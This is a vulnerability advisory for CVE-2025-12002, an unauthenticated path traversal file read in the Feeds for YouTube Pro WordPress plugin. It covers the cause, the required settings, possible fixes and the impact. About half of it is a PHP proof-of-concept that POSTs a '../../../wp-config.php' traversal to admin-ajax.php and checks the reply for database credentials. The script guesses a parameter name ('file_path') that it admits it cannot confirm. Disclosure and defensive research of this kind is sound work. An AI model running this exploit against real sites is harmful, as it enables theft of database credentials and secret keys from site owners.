Atomic Edge analysis of CVE-2025-12002 (metadata-based):
This vulnerability is an unauthenticated arbitrary file read via path traversal in the Feeds for YouTube Pro WordPress plugin. The flaw resides in the plugin’s AJAX handler for the ‘sby_check_wp_submit’ action. Attackers can exploit this to read sensitive files from the server, contingent on specific plugin settings being configured. The CVSS score of 5.9 reflects a high confidentiality impact tempered by high attack complexity.
The root cause is improper limitation of a pathname to a restricted directory (CWE-22). The vulnerability description confirms insufficient sanitization of user-supplied data before its use in a file operation. Atomic Edge research infers that a user-controlled parameter, likely containing a file path, is passed directly to a file-reading function like `file_get_contents()` without proper validation. The metadata does not confirm the exact parameter name or function, but the CWE classification strongly indicates a classic path traversal flaw.
Exploitation targets the WordPress AJAX endpoint `/wp-admin/admin-ajax.php`. An unauthenticated attacker sends a POST request with the `action` parameter set to `sby_check_wp_submit`. The attack payload is a path traversal sequence (e.g., `../../../wp-config.php`) supplied via another, unspecified POST parameter. Successful exploitation requires the plugin’s ‘Save Featured Images’ setting to be enabled and ‘Disable WP Posts’ setting to be disabled.
Remediation requires implementing proper input validation and path sanitization. The patched version likely adds a check to ensure the user-supplied path is within an allowed directory, such as using `realpath()` and checking the result against a whitelist. Sanitization functions like `sanitize_file_name()` or `basename()` may also be employed to strip directory traversal sequences before file operations.
If exploited, this vulnerability allows unauthenticated attackers to read arbitrary files from the server filesystem. This includes sensitive WordPress configuration files like `wp-config.php`, which contains database credentials and secret keys. Attackers can also read server logs, environment files, and other application source code, leading to further information disclosure and potential system compromise.
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-12002 - Feeds for YouTube Pro <= 2.6.0 - Unauthenticated Arbitrary File Read via Path Traversal
<?php
$target_url = 'https://example.com/wp-admin/admin-ajax.php'; // CHANGE THIS
// The vulnerable AJAX action
$post_data = ['action' => 'sby_check_wp_submit'];
// The specific vulnerable parameter name is not disclosed in the CVE metadata.
// Based on the vulnerability type and common plugin patterns, we infer a parameter like 'file', 'path', or 'url'.
// This PoC assumes a parameter named 'file_path'.
// An attacker would need to enumerate the correct parameter name in a real engagement.
$post_data['file_path'] = '../../../wp-config.php';
// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Disable for testing in non-production environments
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
// Output results
if ($http_code == 200 && !empty($response)) {
echo "Potential success. Response (first 500 chars):n";
echo substr($response, 0, 500);
if (strpos($response, 'DB_NAME') !== false) {
echo "nn[+] Likely successful read of wp-config.phpn";
}
} else {
echo "Request failed or returned empty. HTTP Code: $http_coden";
echo "Note: Exploitation requires the plugin's 'Save Featured Images' setting enabled and 'Disable WP Posts' disabled.n";
}
?>
